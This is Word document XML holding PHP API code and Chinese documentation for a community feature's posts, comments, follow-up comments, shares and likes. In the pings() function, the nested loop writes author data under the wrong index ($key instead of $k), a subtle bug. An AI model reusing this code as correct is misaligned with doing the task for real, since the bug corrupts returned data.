    <w:p w14:paraId="5CDB00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($images as $image) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A494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$article['image_urls'][] = _imgUrl() . $image;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEA6D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72D2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0204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$article['author_username'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407BAB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$article['author_img'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6365E7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$article['author_follow_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576D3D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$article['author_article_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D2F6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$article['zan'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4550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$article['follow'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2D2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Db::name('member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0099FB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$article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E49DE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2E81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_user($article['member_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE7C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40F7BD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$article['author_username'] = $author['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B35EF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$article['author_img'] = $author['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F366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$article['author_follow_num'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4624A5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06FFF8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4F6D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$article['author_article_num'] = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF867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$article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB8B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24256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$article['author_article_num'] += Db::name('article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66028E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$article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B216B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C2479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463E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27D59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$article['zan'] = Db::name('circle_article_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474059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$article_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA9F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35EB85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277B5C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2A24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$article['follow'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658DF6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1230BE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73034C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09AA1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23D4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 = Db::name('circle_article_ping')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A90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$article_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0379F0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780F4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E2AC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(count($pings) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492A7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($pings as $key =&gt; $ping) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E375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$pings[$key]['zan'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE337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6D89C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$pings[$key]['zan'] = Db::name('circle_article_ping_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0A3B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469C1E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$ping['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E44C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5EE2B8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AC2F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D6C7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 = Db::name('circle_article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBA8E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$ping['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE99A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22D2C5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-&gt;limit(3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFD62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35CB44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(count($ping_xias) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52014C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($ping_xias as $k =&gt; $ping_xia) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E672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$ping_xias[$k]['zan'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B0EB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B3460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$ping_xias[$k]['zan'] = Db::name('circle_article_ping_xia_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435D5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6FE27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-&gt;where('ping_xia_id', $ping_xia['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9C1A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25AFBB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1B7B0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EFDE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111E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$pings[$key]['ping_xias'] = $ping_xias;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B8C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8456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$pings[$key]['ping_xias'] = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095511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8F95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5A0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$article['pings'] = $pings;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323912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27DA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$article['pings'] = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1B5D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CC53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json($article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AFD2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32E6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ECB70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该社区动态不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9958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5EEC22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F40B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642B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E2C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/api/circle/pings </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获得社区文评论列表（附加三条追评）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23646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获得社区动态评论列表（附加三条追评）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D58DD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353255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6F549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6B0A2C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（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0047B1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5966F0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per_page          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D192D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社区动态列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F02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total           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>总记录数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA5E4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per_page        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602951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current_page    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前页码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C27C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               </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据集合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4006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data.*.author_username  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该评论作者昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C503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data.*.author_img       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该评论作者头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D556A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data.*.zan             </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否点赞该评论：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0DC6C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data.*.ping_xias           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>追评数据集合（至多三条追评）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132B46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data.*.ping_xias.*.author_username  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该追评作者昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3BC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data.*.ping_xias.*.author_img       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该追评作者头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A4A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data.*.ping_xias.*.zan             </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否点赞该追评：</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053532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E8C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pings()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52568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9FA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51D661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28785F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E808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5C8DB2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31745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CBB0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2D21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395DF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-&gt;where('id', $article_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F0E8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6170F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1DC4AD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D3411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该社区动态不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7198F4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13F6E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69C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421A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2A0571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6);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE12C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 = Db::name('circle_article_ping')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328159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$article_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276265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04D732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4EBDB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5F987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(count($pings['data']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76968D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($pings['data'] as $key =&gt; $ping) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CD51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$pings['data'][$key]['author_username'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C4D2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$pings['data'][$key]['author_img'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C06D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$pings['data'][$key]['zan'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45294D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_user($ping['member_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C83DF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4A2B4E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$pings['data'][$key]['author_username'] = $author['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A75DD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$pings['data'][$key]['author_img'] = $author['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BA6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A37D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03136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$pings['data'][$key]['zan'] = Db::name('circle_article_ping_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAC11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33273C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$ping['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033D81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6995C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29A88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74DB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 = Db::name('circle_article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3704F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$ping['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D96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3302EA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-&gt;limit(3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F51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2F05F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(count($ping_xias) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9933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($ping_xias as $k =&gt; $ping_xia) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426681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$ping_xias[$key]['author_username'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71772D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$ping_xias[$key]['author_img'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041CA5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$ping_xias[$k]['zan'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A12F4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_user($ping_xia['member_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243CE8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4FAD1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$ping_xias[$key]['author_username'] = $author['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1333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$ping_xias[$key]['author_img'] = $author['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA78D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E93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A3CD4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$ping_xias[$k]['zan'] = Db::name('circle_article_ping_xia_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA668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-&gt;where('member_id', $this-&gt;memberId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF175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-&gt;where('ping_xia_id', $ping_xia['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463319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316874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0F5A19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8DBA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2FBC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$pings['data'][$key]['ping_xias'] = $ping_xias;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386C3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B0A5B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$pings['data'][$key]['ping_xias'] = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4776C9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200B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56E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719B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json($pings);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45714E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E302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EF84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/api/circle/ping_xias </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获得社区文追评列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ACE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获得社区动态追评列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA8B0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2E8080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2BEF7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43356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（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C686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ping_id      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68229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          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>页码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132AC2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per_page      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A719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社区动态列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221146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total           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>总记录数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD61D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per_page        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30297C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current_page    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前页码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AB1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              </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据集合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394E5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data.*.author_username  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该追评作者昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0EA5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data.*.author_img       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该追评作者头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DF9E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data.*.zan             </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否点赞该追评：</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7BF0B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29F3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ping_xias()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6A0E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CA7E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2D6E3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78415A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E28FE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05C54E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D674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29D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8294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317D3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2BC83A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B7F7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244F0E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7FAFE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该社区动态不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430D9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7AEFD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F6CD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36EC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$ping_id = input('param.ping_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0A00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($ping_id == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB35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47CDB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社区动态评论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64EEC5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70A2B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2885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A55C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 = Db::name('circle_article_ping')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D707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4F3A49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0A1AB2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(empty($ping)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D32C3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F835D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该社区动态评论不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB5E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55F2C4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69B6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9593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745A09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6);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2C4C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 = Db::name('circle_article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67843B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-&gt;where('ping_id', $ping_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F78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7052EC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385756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09968F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(count($ping_xias['data']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700D19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($ping_xias['data'] as $key =&gt; $ping_xia) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A33B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$ping_xias['data'][$key]['author_username'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3C73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$ping_xias['data'][$key]['author_img'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601EB3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$ping_xias['data'][$key]['zan'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D327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_user($ping_xia['member_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03970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52EAA9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$ping_xias['data'][$key]['author_username'] = $author['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7944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$ping_xias['data'][$key]['author_img'] = $author['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A44B3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A2F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DF40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$ping_xias['data'][$key]['zan'] = Db::name('circle_article_ping_xia_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364F14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12CE2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-&gt;where('ping_xia_id', $ping_xia['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A277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278A4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F63D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4ECC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1862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7E66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json($ping_xias);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F37C5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8DDC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626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/api/circle/article_share </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分享社区动态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040F2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分享社区动态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539E6E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00650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D3FCC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（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639752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{String} ret       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户分享成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F441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用户分享失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32965C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4D59CA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B33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article_share()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFF8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0D6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0E6DE5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28FD46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7812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131BE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请先登录账号，然后分享社区动态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C64A7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3C7AFC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3A23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7F00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4D348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72CBD0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0165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43649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04D2FB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01F3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EDCE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3C811A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3FDD88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0BC16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3AC1CF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38504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7A6A50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-&gt;setInc('share_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8E7F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4C238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用户分享成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A03F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E32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7564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36472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该社区动态不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7A25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7BF64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1CEF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2F77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FFCB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37EF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F357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/api/circle/article_zan </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>点赞｜取消点赞社区动态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19811E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点赞｜取消点赞社区动态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097260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3EB2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0719D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1AB10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（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA0D2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用户点赞｜取消点赞成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BF04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已点赞；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已取消点赞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191B76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用户点赞失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA52A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546DD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E50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article_zan()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4F5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E527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32E04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676732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CFE76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9036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请先登录账号，然后点赞社区动态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237292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7D6FD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D453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8996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225EF8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3075DD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4CC12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13FF63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7A71D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34FF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93972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4BF0B6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6C86F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07901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0D4C23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$data['article_id'] = $article_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF66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$circle_article_zan = Db::name('circle_article_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CA1E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0C101C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1333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(!empty($circle_article_zan)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B898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($circle_article_zan['zan'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C9A1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Db::name('circle_article_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73323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67B12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12468A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37425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 =&gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06455E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2E3BB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A9FE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B93E5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23E5FF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49864A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'zan_num' =&gt; $article['zan_num'] - 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDC5B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'cai_num' =&gt; $article['cai_num'] + 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B54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C050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】已取消点赞您所发布的动态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEB0F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$article['member_id'], $content, '', '', '', $article_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ABF9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78B9C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用户取消点赞成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EFF6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2DD50A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0866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A4464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Db::name('circle_article_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC10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23A3A5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-&gt;update([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FDA7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391748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 =&gt; 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D428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0D003A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D8D9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w:t>
      </w:r>
    </w:p>
